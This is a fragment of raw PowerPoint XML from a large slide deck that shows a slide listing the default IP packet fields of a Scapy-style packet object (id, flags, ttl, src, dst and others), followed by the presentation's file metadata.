              <a:t>id         : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          = ('1')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FlagsField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          = ('&lt;Flag 0 ()&gt;')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frag       : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BitField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  (13 bits)                 = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ttl</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ByteField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                           = ('64')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ByteEnumField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chksum</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XShortField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                         = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</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SourceIPField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dst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DestIPField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                         = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>options    : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PacketListField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                     = ('[]')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18613154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dk1">
            <a:alpha val="50000"/>
          </a:schemeClr>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1860</TotalTime>
  <Words>22971</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>2554</Paragraphs>
  <Slides>201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201</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="209" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</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Joseph Ibrahim</dc:creator>
  <cp:lastModifiedBy>Khalid Ibrahim Hamed Al Hajri</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-19T18:59:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-04T21:09:27Z</dcterms:modified>
</cp:coreProperties>
</file>